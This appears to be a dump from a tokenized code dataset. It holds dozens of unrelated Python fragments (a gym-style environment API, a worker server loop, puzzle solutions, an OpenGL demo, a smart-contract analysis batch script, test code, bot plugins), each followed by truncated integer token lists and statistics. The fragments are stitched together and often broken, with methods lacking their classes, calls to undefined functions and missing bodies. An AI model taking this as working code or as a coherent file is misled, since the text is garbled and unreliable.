[ 11748, 35555, 13, 316, 631, 13, 20180, 27660, 355, 2123, 198, 198, 6738, 3128, 22602, 1330, 30751, 198, 198, 6738, 42625, 14208, 13, 19509, 23779, 1330, 8543, 198, 6738, 42625, 14208, 13, 19509, 23779, 1330, 18941, 198, 6738, 42625, 14208...
3.615385
130
from contextlib import closing from io import StringIO import numpy import pandas from airflow.providers.postgres.hooks.postgres import PostgresHook from psycopg2.extensions import connection as psycopg2_connection from data_detective_airflow.dag_generator.works import WorkType from data_detective_airflow.operators.sinks.pg_loader import PgLoader, MAX_INSERT_ROWS_NUMBER
[ 6738, 4732, 8019, 1330, 9605, 198, 6738, 33245, 1330, 10903, 9399, 198, 198, 11748, 299, 32152, 198, 11748, 19798, 292, 198, 6738, 45771, 13, 15234, 4157, 13, 7353, 34239, 13, 25480, 82, 13, 7353, 34239, 1330, 2947, 34239, 39, 566, 198,...
3.298246
114
"""Plangym API implementation.""" from abc import ABC from typing import Any, Callable, Dict, Generator, Iterable, Optional, Tuple, Union import gym from gym.envs.registration import registry as gym_registry from gym.spaces import Space import numpy import numpy as np wrap_callable = Union[Callable[[], gym.Wrapper], Tuple[Callable[..., gym.Wrapper], Dict[str, Any]]] def step( self, action: Union[numpy.ndarray, int, float], state: numpy.ndarray = None, dt: int = 1, ) -> tuple: """ Step the environment applying the supplied action. Optionally set the state to the supplied state before stepping it. Take ``dt`` simulation steps and make the environment evolve in multiples \ of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps. Args: action: Chosen action applied to the environment. state: Set the environment to the given state before stepping it. dt: Consecutive number of times that the action will be applied. Returns: if state is None returns ``(observs, reward, terminal, info)`` else returns ``(new_state, observs, reward, terminal, info)`` """ if state is not None: self.set_state(state) obs, reward, terminal, info = self.step_with_dt(action=action, dt=dt) if state is not None: new_state = self.get_state() data = new_state, obs, reward, terminal, info else: data = obs, reward, terminal, info if terminal and self.autoreset: self.reset(return_state=False) return data def step_batch( self, actions: Union[numpy.ndarray, Iterable[Union[numpy.ndarray, int]]], states: Union[numpy.ndarray, Iterable] = None, dt: Union[int, numpy.ndarray] = 1, ) -> Tuple[numpy.ndarray, ...]: """ Vectorized version of the `step` method. It allows to step a vector of \ states and actions. The signature and behaviour is the same as `step`, but taking a list of \ states, actions and dts as input. Args: actions: Iterable containing the different actions to be applied. states: Iterable containing the different states to be set. dt: int or array containing the frameskips that will be applied. Returns: if states is None returns ``(observs, rewards, ends, infos)`` else returns ``(new_states, observs, rewards, ends, infos)`` """ dt = ( dt if isinstance(dt, (numpy.ndarray, Iterable)) else numpy.ones(len(actions), dtype=int) * dt ) no_states = states is None or states[0] is None states = [None] * len(actions) if no_states else states data = [self.step(action, state, dt=dt) for action, state, dt in zip(actions, states, dt)] return tuple(list(x) for x in zip(*data)) def init_env(self) -> None: """ Run environment initialization. Including in this function all the code which makes the environment impossible to serialize will allow to dispatch the environment to different workers and initialize it once it's copied to the target process. """ pass def close(self) -> None: """Tear down the current environment.""" pass def sample_action(self): """ Return a valid action that can be used to step the Environment. Implementing this method is optional, and it's only intended to make the testing process of the Environment easier. """ pass def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple: """ Take ``dt`` simulation steps and make the environment evolve in multiples \ of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps. Args: action: Chosen action applied to the environment. dt: Consecutive number of times that the action will be applied. Returns: tuple containing ``(observs, reward, terminal, info)``. """ raise NotImplementedError() def reset( self, return_state: bool = True, ) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]: """ Restart the environment. Args: return_state: If ``True`` it will return the state of the environment. Returns: ``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``. """ raise NotImplementedError() def get_state(self) -> Any: """ Recover the internal state of the simulation. A state must completely describe the Environment at a given moment. """ raise NotImplementedError() def set_state(self, state: Any) -> None: """ Set the internal state of the simulation. Args: state: Target state to be set in the environment. Returns: None """ raise NotImplementedError() def get_image(self) -> Union[None, np.ndarray]: """ Return a numpy array containing the rendered view of the environment. Square matrices are interpreted as a greyscale image. Three-dimensional arrays are interpreted as RGB images with channels (Height, Width, RGB) """ return None def clone(self) -> "BaseEnvironment": """Return a copy of the environment.""" raise NotImplementedError() class PlanEnvironment(BaseEnvironment): """Base class for implementing OpenAI ``gym`` environments in ``plangym``.""" def __init__( self, name: str, frameskip: int = 1, episodic_live: bool = False, autoreset: bool = True, wrappers: Iterable[wrap_callable] = None, delay_init: bool = False, remove_time_limit=True, ): """ Initialize a :class:`PlanEnvironment`. Args: name: Name of the environment. Follows standard gym syntax conventions. frameskip: Number of times an action will be applied for each ``dt``. episodic_live: Return ``end = True`` when losing a live. autoreset: Automatically reset the environment when the OpenAI environment returns ``end = True``. wrappers: Wrappers that will be applied to the underlying OpenAI env. \ Every element of the iterable can be either a :class:`gym.Wrapper` \ or a tuple containing ``(gym.Wrapper, kwargs)``. delay_init: If ``True`` do not initialize the ``gym.Environment`` \ and wait for ``init_env`` to be called later. remove_time_limit: If True, remove the time limit from the environment. """ self._gym_env = None self.episodic_life = episodic_live self.remove_time_limit = remove_time_limit self._wrappers = wrappers super(PlanEnvironment, self).__init__( name=name, frameskip=frameskip, autoreset=autoreset, delay_init=delay_init, ) def init_env(self): """Initialize the target :class:`gym.Env` instance.""" self._gym_env = self.init_gym_env() if self._wrappers is not None: self.apply_wrappers(self._wrappers) def get_image(self) -> np.ndarray: """ Return a numpy array containing the rendered view of the environment. Square matrices are interpreted as a greyscale image. Three-dimensional arrays are interpreted as RGB images with channels (Height, Width, RGB) """ if hasattr(self.gym_env, "render"): return self.gym_env.render(mode="rgb_array") def reset( self, return_state: bool = True, ) -> Union[numpy.ndarray, Tuple[numpy.ndarray, numpy.ndarray]]: """ Restart the environment. Args: return_state: If ``True`` it will return the state of the environment. Returns: ``obs`` if ```return_state`` is ``True`` else return ``(state, obs)``. """ if self.gym_env is None and self.delay_init: self.init_env() obs = self.gym_env.reset() return (self.get_state(), obs) if return_state else obs def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1): """ Take ``dt`` simulation steps and make the environment evolve in multiples\ of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps. Args: action: Chosen action applied to the environment. dt: Consecutive number of times that the action will be applied. Returns: if state is None returns ``(observs, reward, terminal, info)`` else returns ``(new_state, observs, reward, terminal, info)`` """ reward = 0 obs, lost_live, terminal, oob = None, False, False, False info = {"lives": -1} n_steps = 0 for _ in range(int(dt)): for _ in range(self.frameskip): obs, _reward, _oob, _info = self.gym_env.step(action) _info["lives"] = self.get_lives_from_info(_info) lost_live = info["lives"] > _info["lives"] or lost_live oob = oob or _oob custom_terminal = self.custom_terminal_condition(info, _info, _oob) terminal = terminal or oob or custom_terminal terminal = (terminal or lost_live) if self.episodic_life else terminal info = _info.copy() reward += _reward n_steps += 1 if terminal: break if terminal: break # This allows to get the original values even when using an episodic life environment info["terminal"] = terminal info["lost_live"] = lost_live info["oob"] = oob info["win"] = self.get_win_condition(info) info["n_steps"] = n_steps return obs, reward, terminal, info def sample_action(self) -> Union[int, np.ndarray]: """Return a valid action that can be used to step the Environment chosen at random.""" if hasattr(self.action_space, "sample"): return self.action_space.sample() def clone(self) -> "PlanEnvironment": """Return a copy of the environment.""" return self.__class__( name=self.name, frameskip=self.frameskip, wrappers=self._wrappers, episodic_live=self.episodic_life, autoreset=self.autoreset, delay_init=self.delay_init, ) def close(self): """Close the underlying :class:`gym.Env`.""" if hasattr(self, "_gym_env") and hasattr(self._gym_env, "close"): return self._gym_env.close() def init_gym_env(self) -> gym.Env: """Initialize the :class:`gym.Env`` instance that the current class is wrapping.""" # Remove any undocumented wrappers spec = gym_registry.spec(self.name) if self.remove_time_limit: if hasattr(spec, "max_episode_steps"): spec._max_episode_steps = spec.max_episode_steps if hasattr(spec, "max_episode_time"): spec._max_episode_time = spec.max_episode_time spec.max_episode_steps = None spec.max_episode_time = None gym_env: gym.Env = spec.make() gym_env.reset() return gym_env def seed(self, seed=None): """Seed the underlying :class:`gym.Env`.""" if hasattr(self.gym_env, "seed"): return self.gym_env.seed(seed) def apply_wrappers(self, wrappers: Iterable[wrap_callable]): """Wrap the underlying OpenAI gym environment.""" for item in wrappers: if isinstance(item, tuple): wrapper, kwargs = item self.wrap(wrapper, **kwargs) else: self.wrap(item) def wrap(self, wrapper: Callable, *args, **kwargs): """Apply a single OpenAI gym wrapper to the environment.""" self._gym_env = wrapper(self.gym_env, *args, **kwargs) def render(self, mode=None): """Render the environment using OpenGL. This wraps the OpenAI render method.""" if hasattr(self.gym_env, "render"): return self.gym_env.render(mode=mode) class VideogameEnvironment(PlanEnvironment): """Common interface for working with video games that run using an emulator.""" def __init__( self, name: str, frameskip: int = 5, episodic_live: bool = False, autoreset: bool = True, delay_init: bool = False, remove_time_limit: bool = True, obs_type: str = "rgb", # ram | rgb | grayscale mode: int = 0, # game mode, see Machado et al. 2018 difficulty: int = 0, # game difficulty, see Machado et al. 2018 repeat_action_probability: float = 0.0, # Sticky action probability full_action_space: bool = False, # Use all actions render_mode: Optional[str] = None, # None | human | rgb_array possible_to_win: bool = False, wrappers: Iterable[wrap_callable] = None, ): """ Initialize a :class:`VideogameEnvironment`. Args: name: Name of the environment. Follows standard gym syntax conventions. frameskip: Number of times an action will be applied for each step in dt. episodic_live: Return ``end = True`` when losing a life. autoreset: Restart environment when reaching a terminal state. delay_init: If ``True`` do not initialize the ``gym.Environment`` and wait for ``init_env`` to be called later. remove_time_limit: If True, remove the time limit from the environment. obs_type: One of {"rgb", "ram", "gryscale"}. mode: Integer or string indicating the game mode, when available. difficulty: Difficulty level of the game, when available. repeat_action_probability: Repeat the last action with this probability. full_action_space: Whether to use the full range of possible actions or only those available in the game. render_mode: One of {None, "human", "rgb_aray"}. possible_to_win: It is possible to finish the Atari game without getting a terminal state that is not out of bounds or doest not involve losing a life. wrappers: Wrappers that will be applied to the underlying OpenAI env. Every element of the iterable can be either a :class:`gym.Wrapper` or a tuple containing ``(gym.Wrapper, kwargs)``. """ self._remove_time_limit = remove_time_limit self.possible_to_win = possible_to_win self._obs_type = obs_type self._mode = mode self._difficulty = difficulty self._repeat_action_probability = repeat_action_probability self._full_action_space = full_action_space self._render_mode = render_mode super(VideogameEnvironment, self).__init__( name=name, frameskip=frameskip, episodic_live=episodic_live, autoreset=autoreset, wrappers=wrappers, delay_init=delay_init, ) def clone(self, **kwargs) -> "VideogameEnvironment": """Return a copy of the environment.""" params = dict( name=self.name, frameskip=self.frameskip, wrappers=self._wrappers, episodic_live=self.episodic_life, autoreset=self.autoreset, delay_init=self.delay_init, possible_to_win=self.possible_to_win, clone_seeds=self.clone_seeds, mode=self.mode, difficulty=self.difficulty, obs_type=self.obs_type, repeat_action_probability=self.repeat_action_probability, full_action_space=self.full_action_space, render_mode=self.render_mode, remove_time_limit=self._remove_time_limit, ) params.update(**kwargs) return self.__class__(**params) def get_ram(self) -> np.ndarray: """Return the ram of the emulator as a numpy array.""" raise NotImplementedError() class VectorizedEnvironment(BaseEnvironment, ABC): """ Base class that defines the API for working with vectorized environments. A vectorized environment allows to step several copies of the environment in parallel when calling ``step_batch``. It creates a local copy of the environment that is the target of all the other methods of :class:`BaseEnvironment`. In practise, a :class:`VectorizedEnvironment` acts as a wrapper of an environment initialized with the provided parameters when calling __init__. """ def __init__( self, env_class, name: str, frameskip: int = 1, autoreset: bool = True, delay_init: bool = False, n_workers: int = 8, **kwargs, ): """ Initialize a :class:`VectorizedEnvironment`. Args: env_class: Class of the environment to be wrapped. name: Name of the environment. frameskip: Number of times ``step`` will me called with the same action. autoreset: Ignored. Always set to True. Automatically reset the environment when the OpenAI environment returns ``end = True``. delay_init: If ``True`` do not initialize the ``gym.Environment`` \ and wait for ``init_env`` to be called later. env_callable: Callable that returns an instance of the environment \ that will be parallelized. n_workers: Number of workers that will be used to step the env. **kwargs: Additional keyword arguments passed to env_class.__init__. """ self._n_workers = n_workers self._env_class = env_class self._env_kwargs = kwargs self._plangym_env = None self.SINGLETON = env_class.SINGLETON if hasattr(env_class, "SINGLETON") else False self.RETURNS_GYM_TUPLE = ( env_class.RETURNS_GYM_TUPLE if hasattr(env_class, "RETURNS_GYM_TUPLE") else True ) self.STATE_IS_ARRAY = ( env_class.STATE_IS_ARRAY if hasattr(env_class, "STATE_IS_ARRAY") else True ) super(VectorizedEnvironment, self).__init__( name=name, frameskip=frameskip, autoreset=autoreset, delay_init=delay_init, ) def __getattr__(self, item): """Forward attributes to the wrapped environment.""" return getattr(self.plangym_env, item) def create_env_callable(self, **kwargs) -> Callable[..., BaseEnvironment]: """Return a callable that initializes the environment that is being vectorized.""" callable_kwargs = dict( env_class=self._env_class, name=self.name, frameskip=self.frameskip, delay_init=self._env_class.SINGLETON, **self._env_kwargs, ) callable_kwargs.update(kwargs) return create_env_callable(**callable_kwargs) def init_env(self) -> None: """Initialize the target environment with the parameters provided at __init__.""" self._plangym_env: BaseEnvironment = self.create_env_callable()() self._plangym_env.init_env() def step(self, action: numpy.ndarray, state: numpy.ndarray = None, dt: int = 1): """ Step the environment applying a given action from an arbitrary state. If is not provided the signature matches the one from OpenAI gym. It allows \ to apply arbitrary boundary conditions to define custom end states in case \ the env was initialized with a "CustomDeath' object. Args: action: Array containing the action to be applied. state: State to be set before stepping the environment. dt: Consecutive number of times to apply the given action. Returns: if states is None returns `(observs, rewards, ends, infos) `else \ `(new_states, observs, rewards, ends, infos)`. """ return self.plangym_env.step(action=action, state=state, dt=dt) def reset(self, return_state: bool = True): """ Reset the environment and returns the first observation, or the first \ (state, obs) tuple. Args: return_state: If true return a also the initial state of the env. Returns: Observation of the environment if `return_state` is False. Otherwise, return (state, obs) after reset. """ state, obs = self.plangym_env.reset(return_state=True) self.sync_states(state) return (state, obs) if return_state else obs def get_state(self): """ Recover the internal state of the simulation. An state completely describes the Environment at a given moment. Returns: State of the simulation. """ return self.plangym_env.get_state() def set_state(self, state): """ Set the internal state of the simulation. Args: state: Target state to be set in the environment. """ self.plangym_env.set_state(state) self.sync_states(state) def render(self, mode="human"): """Render the environment using OpenGL. This wraps the OpenAI render method.""" return self.plangym_env.render(mode) def get_image(self) -> np.ndarray: """ Return a numpy array containing the rendered view of the environment. Square matrices are interpreted as a greyscale image. Three-dimensional arrays are interpreted as RGB images with channels (Height, Width, RGB) """ return self.plangym_env.get_image() def step_with_dt(self, action: Union[numpy.ndarray, int, float], dt: int = 1) -> tuple: """ Take ``dt`` simulation steps and make the environment evolve in multiples\ of ``self.frameskip`` for a total of ``dt`` * ``self.frameskip`` steps. Args: action: Chosen action applied to the environment. dt: Consecutive number of times that the action will be applied. Returns: If state is None returns ``(observs, reward, terminal, info)`` else returns ``(new_state, observs, reward, terminal, info)`` """ return self.plangym_env.step_with_dt(action=action, dt=dt) def sample_action(self): """ Return a valid action that can be used to step the Environment. Implementing this method is optional, and it's only intended to make the testing process of the Environment easier. """ return self.plangym_env.sample_action() def sync_states(self, state: None): """ Synchronize the workers' states with the state of ``self.gym_env``. Set all the states of the different workers of the internal :class:`BatchEnv`\ to the same state as the internal :class:`Environment` used to apply the\ non-vectorized steps. """ raise NotImplementedError() def step_batch( self, actions: numpy.ndarray, states: numpy.ndarray = None, dt: [numpy.ndarray, int] = 1, ): """ Vectorized version of the ``step`` method. It allows to step a vector of states and actions. The signature and \ behaviour is the same as ``step``, but taking a list of states, actions \ and dts as input. Args: actions: Iterable containing the different actions to be applied. states: Iterable containing the different states to be set. dt: int or array containing the frameskips that will be applied. Returns: if states is None returns ``(observs, rewards, ends, infos)`` else \ ``(new_states, observs, rewards, ends, infos)`` """ raise NotImplementedError() def clone(self, **kwargs) -> "BaseEnvironment": """Return a copy of the environment.""" self_kwargs = dict( name=self.name, frameskip=self.frameskip, delay_init=self.delay_init, env_class=self._env_class, n_workers=self.n_workers, **self._env_kwargs, ) self_kwargs.update(kwargs) env = self.__class__(**self_kwargs) return env
[ 37811, 3646, 648, 4948, 7824, 7822, 526, 15931, 198, 6738, 450, 66, 1330, 9738, 198, 6738, 19720, 1330, 4377, 11, 4889, 540, 11, 360, 713, 11, 35986, 11, 40806, 540, 11, 32233, 11, 309, 29291, 11, 4479, 198, 198, 11748, 11550, 198, ...
2.340045
10,728
# Layer 2 server script # project worker '''-. +#_p'-..... *+...:(loop):.............................................. m}: \ >!: 1. register clients \ &w^: 2. distribute WLs and add them to pending \ j/6: 3. move results to results dir \ @%: 4. remove timed-out from pending and re-open them : #$: 5. check if done / 6@y: 6. backup and call htmlUpdate / <: / %$":......................................................../ %&"$%!.- $"!.- ''' import sys, os, pickle, shutil, htmlTool from time import time, sleep os.chdir(os.path.expanduser("~")) project = sys.argv[-1] projDir = f'apps/aligner/projects/{project}' clientsDir = f'{projDir}/clients' regDir = f'{projDir}/registrations' backupDir = f'{projDir}/backup' resDir = f'{projDir}/results' # load from backup with open(f'{backupDir}/openWLs','rb') as tmp: openWLs = pickle.load(tmp) with open(f'{backupDir}/pendingWLs','rb') as tmp: pendingWLs = pickle.load(tmp) with open(f'{backupDir}/assignmentTimes','rb') as tmp: assignmentTimes = pickle.load(tmp) print(f'{project}: \tretrieved data from project backup (open: {len(openWLs)}; pending: {len(pendingWLs)})') backup_counter = 0 done = False while not done: # 1. for ID in os.listdir(regDir): registerClient(ID) os.remove(f'{regDir}/{ID}') # 2. passWLs() # 3. moveResults() # 4. reopen() # 5. if checkDone(): done = True # 6. if backup_counter == 100 or done: backup() try: htmlTool.update() except: pass backup_counter = 0 if done: os.rename(projDir,f'{projDir}__done__') backup_counter += 1 sleep(1.74)
[ 2, 34398, 362, 4382, 4226, 201, 198, 2, 1628, 8383, 201, 198, 201, 198, 201, 198, 7061, 29001, 13, 201, 198, 10, 2, 62, 79, 29001, 12359, 201, 198, 9, 10, 986, 37498, 26268, 2599, 8864, 2109, 16317, 201, 198, 76, 38362, 220, 220, ...
1.927326
1,032
import factory from spaceone.core import utils from spaceone.statistics.model.schedule_model import Schedule, Scheduled, JoinQuery, Formula, QueryOption
[ 11748, 8860, 198, 198, 6738, 2272, 505, 13, 7295, 1330, 3384, 4487, 198, 6738, 2272, 505, 13, 14269, 3969, 13, 19849, 13, 15952, 5950, 62, 19849, 1330, 19281, 11, 27774, 6309, 11, 15251, 20746, 11, 19639, 11, 43301, 19722, 628, 628, 6...
3.785714
42
from datetime import datetime from sqlalchemy import Boolean, Column, DateTime, Integer, SmallInteger, String from app.config import settings from app.db.base_class import Base from app.models.task import Task # noqa
[ 6738, 4818, 8079, 1330, 4818, 8079, 198, 198, 6738, 44161, 282, 26599, 1330, 41146, 11, 29201, 11, 7536, 7575, 11, 34142, 11, 10452, 46541, 11, 10903, 198, 198, 6738, 598, 13, 11250, 1330, 6460, 198, 6738, 598, 13, 9945, 13, 8692, 62,...
3.745763
59
import uuid, hashlib, os, yaml, logging.config, json, requests, re from bcrypt import hashpw, gensalt from collections import namedtuple from sqlalchemy import create_engine from datetime import datetime CONFIG_FILE = os.environ.get('CONFIG_PATH_FILE') ZimbraGrant = namedtuple( 'ZimbraGrant', [ 'target_name', 'target_type', 'grantee_name', 'grantee_type', 'right', 'deny' ] ) logger = CallLogger.logger()
[ 11748, 334, 27112, 11, 12234, 8019, 11, 28686, 11, 331, 43695, 11, 18931, 13, 11250, 11, 33918, 11, 7007, 11, 302, 198, 6738, 275, 29609, 1330, 12234, 79, 86, 11, 308, 641, 2501, 198, 6738, 17268, 1330, 3706, 83, 29291, 198, 6738, 4...
2.531429
175
import struct from typing import BinaryIO def write(self, file: BinaryIO, val): raise NotImplementedError # pragma: no cover class CMarkedType(CFixedType): """ Overview: Type with struct mark, which can be directly read by ``struct`` module. """ def __init__(self, mark: str, size: int): """ Constructor of :class:`CMarkedType`. :param mark: Mark of the type. :param size: Size of the type. """ CFixedType.__init__(self, size) self.__mark = mark def read(self, file: BinaryIO): """ Read from binary with ``struct`` module. :param file: Binary file, ``io.BytesIO`` is supported as well. :return: Result value. """ r, = struct.unpack(self.mark, file.read(self.size)) return r def write(self, file: BinaryIO, val): """ Write value to binary IO with ``struct`` module. :param file: Binary file, ``io.BytesIO`` is supported as well. :param val: Writing value. """ file.write(struct.pack(self.mark, float(val)))
[ 11748, 2878, 198, 6738, 19720, 1330, 45755, 9399, 628, 628, 198, 220, 220, 220, 825, 3551, 7, 944, 11, 2393, 25, 45755, 9399, 11, 1188, 2599, 198, 220, 220, 220, 220, 220, 220, 220, 5298, 1892, 3546, 1154, 12061, 12331, 220, 1303, 2...
2.389362
470
# Mendel's First Law # http://rosalind.info/problems/iprb/ import sys import unittest if __name__ == '__main__': hom_dom = int(sys.argv[1]) het = int(sys.argv[2]) hom_rec = int(sys.argv[3]) if hom_dom == 0 or het == 0 or hom_rec == 0: raise Exception("ERROR: Incorrect parameters") result = iprb().main(hom_dom, het, hom_rec) print(result)
[ 2, 20442, 417, 338, 3274, 3854, 198, 2, 2638, 1378, 4951, 282, 521, 13, 10951, 14, 1676, 22143, 14, 541, 26145, 14, 198, 11748, 25064, 198, 11748, 555, 715, 395, 198, 198, 361, 11593, 3672, 834, 6624, 705, 834, 12417, 834, 10354, 19...
2.433566
143
#MAIN method and graphics try: from OpenGL.GL import * from OpenGL import GLU import OpenGL.GL.shaders except: print("OpenGL wrapper for python not found") import glfw import numpy as np from computation import Computation if __name__ == "__main__": #A good configuration: 80x80 balls, space 24, width=height=1000, size=8, speedrange=20, frameskip=3, epsilon=0.01, blocksize=512 comp=Computation(width=1000, height=1000, space=20, xballs=100, yballs=100, speedrange=20,size=4,frameskip=1,epsilon=0.01,blocksize=512) g=Graphics(1000, 1000,comp) g.mainloop();
[ 2, 5673, 1268, 2446, 290, 9382, 201, 198, 28311, 25, 201, 198, 220, 220, 220, 422, 30672, 13, 8763, 1330, 1635, 201, 198, 220, 220, 220, 422, 30672, 1330, 10188, 52, 201, 198, 220, 220, 220, 1330, 30672, 13, 8763, 13, 1477, 9972, ...
2.607759
232
#!/usr/bin/env python from itertools import chain from pathlib import Path from typing import List INPUT_FILE = Path.cwd().parent / "inputs" / "day06.txt" AnswerGroup = List[str] if __name__ == "__main__": with INPUT_FILE.open("r") as f: input = transform_input(f.read()) print(f"Part 1: {part1(input)}") print(f"Part 2: {part2(input)}")
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 198, 198, 6738, 340, 861, 10141, 1330, 6333, 198, 6738, 3108, 8019, 1330, 10644, 198, 6738, 19720, 1330, 7343, 198, 198, 1268, 30076, 62, 25664, 796, 10644, 13, 66, 16993, 22446, 8000, 1220, ...
2.496599
147
from symopt.base import SymOptExpr import sympy as sym
[ 6738, 5659, 8738, 13, 8692, 1330, 15845, 27871, 3109, 1050, 198, 11748, 10558, 88, 355, 5659, 628 ]
3.294118
17
import json import glob from tqdm import tqdm import os contract_dir = 'contract_data' cfiles = glob.glob(contract_dir+'/contract*.json') cjson = {} print "Loading contracts..." for cfile in tqdm(cfiles): cjson.update(json.loads(open(cfile).read())) results = {} missed = [] print "Running analysis..." for c in tqdm(cjson): with open('tmp.evm','w') as of: # print "Out: "+cjson[c][1][2:] of.write(cjson[c][1][2:]+"\0") os.system('python oyente.py tmp.evm -j -b') try: results[c] = json.loads(open('tmp.evm.json').read()) except: missed.append(c) print "Writing results..." with open('results.json', 'w') as of: of.write(json.dumps(results,indent=1)) with open('missed.json', 'w') as of: of.write(json.dumps(missed,indent=1)) print "Completed."
[ 11748, 33918, 198, 11748, 15095, 198, 6738, 256, 80, 36020, 1330, 256, 80, 36020, 198, 11748, 28686, 198, 198, 28484, 62, 15908, 796, 705, 28484, 62, 7890, 6, 220, 198, 198, 12993, 2915, 796, 15095, 13, 4743, 672, 7, 28484, 62, 15908,...
2.432177
317
#! /usr/bin/python # -*- coding: utf-8 -*- import pytest import numpy as np from textory.util import neighbour_diff_squared, num_neighbours, neighbour_count, create_kernel from textory.statistics import variogram, pseudo_cross_variogram def test_variogram(init_np_arrays): """THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES This test needs improvement in calculation and what is tested. Much code is shared with the "neighbour_diff_squared" test in test_util. """ a, _ = init_np_arrays tmp = np.zeros_like(a) lag = 1 lags = range(-lag, lag + 1) rows, cols = a.shape #calculate variogram difference for i in range(0, cols): for j in range(0, rows): for l in lags: for k in lags: if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)): continue else: tmp[i,j] += np.square((a[i, j] - a[i+l, j+k])) tmp = np.nansum(tmp) res = tmp / 40000 assert variogram(a, lag=1) == res def test_pseudo_cross_variogram(init_np_arrays): """THIS TEST ONLY COVERS THE VERSION WITH INEXACT NEIGHBOUR COUNT ON THE EDGES This test needs improvement in calculation and what is tested. Much code is shared with the "neighbour_diff_squared" test in test_util. """ a, b = init_np_arrays tmp = np.zeros_like(a) lag = 1 lags = range(-lag, lag + 1) rows, cols = a.shape #calculate variogram difference for i in range(0, cols): for j in range(0, rows): for l in lags: for k in lags: if (i+l < 0) | (i+l >= cols) | (j+k < 0) | (j+k >= rows) | ((l == 0) & (k == 0)): continue else: tmp[i,j] += np.square((a[i, j] - b[i+l, j+k])) tmp = np.nansum(tmp) res = tmp / 40000 assert pseudo_cross_variogram(a, b, lag=1) == res
[ 2, 0, 1220, 14629, 14, 8800, 14, 29412, 198, 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 198, 11748, 12972, 9288, 198, 11748, 299, 32152, 355, 45941, 198, 6738, 2420, 652, 13, 22602, 1330, 12250, 62, 26069, 62, ...
2.081443
970
# -*- coding: utf-8 -*- # @Author : LG """ 152 ms, Python3 96.83% 14 MB, Python3 12.45% """
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 2, 2488, 13838, 220, 1058, 17370, 198, 198, 37811, 198, 17827, 13845, 11, 220, 11361, 18, 9907, 13, 5999, 4, 220, 198, 1415, 10771, 11, 220, 11361, 18, 1105, 13, 2231,...
1.890909
55
#Leia o sexo de uma pessoa, s aceite as letras M ou F; Caso contrario, pea a digitao novamente sexo= str(input('Digite seu sexo [M/F]: ')).strip().upper()[0] while sexo not in 'MF': sexo=str(input('DIGITE O SEXO [M/F]: ')).strip().upper()[0] print('seu sexo {} e est registrado com sucesso!'.format(sexo))
[ 2, 3123, 544, 267, 1714, 78, 390, 334, 2611, 279, 408, 12162, 11, 264, 31506, 578, 355, 1309, 8847, 337, 267, 84, 376, 26, 11294, 78, 3445, 4982, 11, 613, 64, 257, 3100, 5350, 78, 645, 85, 3263, 68, 198, 198, 8044, 78, 28, 965, ...
2.301471
136
from nonebot.adapters.onebot.v11.event import MessageEvent from nonebot.typing import T_State from nonebot.adapters.onebot.v11 import Bot, Message from plugins.uma.plugins.uma_whois.data_source import UmaWhois from plugins.uma import chara #matcher =on_endswith({'','?',''},priority=5) matcher =UmaWhois().on_regex(r'^(.*)([? ])?',"whois") #matcher =on_startswith('',priority=5) matcher =UmaWhois().on_regex(r'^(.*)([? ])?',"whois")
[ 6738, 4844, 13645, 13, 324, 12126, 13, 505, 13645, 13, 85, 1157, 13, 15596, 1330, 16000, 9237, 198, 6738, 4844, 13645, 13, 774, 13886, 1330, 309, 62, 9012, 198, 6738, 4844, 13645, 13, 324, 12126, 13, 505, 13645, 13, 85, 1157, 1330, ...
2.573964
169
from django.http import HttpResponse from pyspark.sql import SparkSession from django.shortcuts import render from datetime import datetime from core.chartfactory import createBarChart, createPieChart from core.dataprocessor import DataProcessor def sample(request): """ sample python report """ keys = ('Python', 'C++', 'Java', 'Perl', 'Scala', 'Lisp') values = [10,8,6,4,2,1] image_base64 = createBarChart(keys, values, 'Usage', 'Programming language usages') return render( request, 'analyzer/main.html', { 'name': "Jon", 'date': datetime.now(), 'image_base64':image_base64, } ) #google play app report 1 #google play app report 2 #google play app report 3
[ 6738, 42625, 14208, 13, 4023, 1330, 367, 29281, 31077, 198, 6738, 279, 893, 20928, 13, 25410, 1330, 17732, 36044, 198, 6738, 42625, 14208, 13, 19509, 23779, 1330, 8543, 198, 6738, 4818, 8079, 1330, 4818, 8079, 198, 198, 6738, 4755, 13, ...
2.536667
300
from mxnet import nd import os import sys sys.path.append(os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..'))) import utils.common as dataset_commons import cv2 import numpy as np import glob import pandas as pd from gluoncv.data.transforms.presets.ssd import SSDDefaultTrainTransform from matplotlib import pyplot as plt ''' This code only gives you a tool to visualize the images pointed in the csv file and the related bounding boxes using openCV ''' data_common = dataset_commons.get_dataset_files() # classes_keys = [key for key in data_common['classes']] if __name__ == "__main__": source_images_path = data_common['image_folder'] source_csv_path = data_common['csv_path'] # TODO: Set the file save path images_path_save = 'images_augmented/' # Folder that will contain the resized images csv_path_save = 'images_augmented/csv/val_dataset.csv' img_height = 300 img_width = 300 csv_converter = load_images_from_csv_and_augment(source_images_path, source_csv_path, images_path_save, img_width, img_height) if not os.path.exists(images_path_save): try: os.makedirs(images_path_save + 'csv') except OSError as e: if e.errno != errno.EEXIST: raise csv_converter.to_csv(csv_path_save, index=None) print('Successfully converted to a new csv file.')
[ 6738, 285, 87, 3262, 1330, 299, 67, 198, 11748, 28686, 198, 11748, 25064, 198, 17597, 13, 6978, 13, 33295, 7, 418, 13, 6978, 13, 397, 2777, 776, 7, 418, 13, 6978, 13, 22179, 7, 418, 13, 6978, 13, 15908, 3672, 7, 11593, 7753, 834, ...
2.541284
545
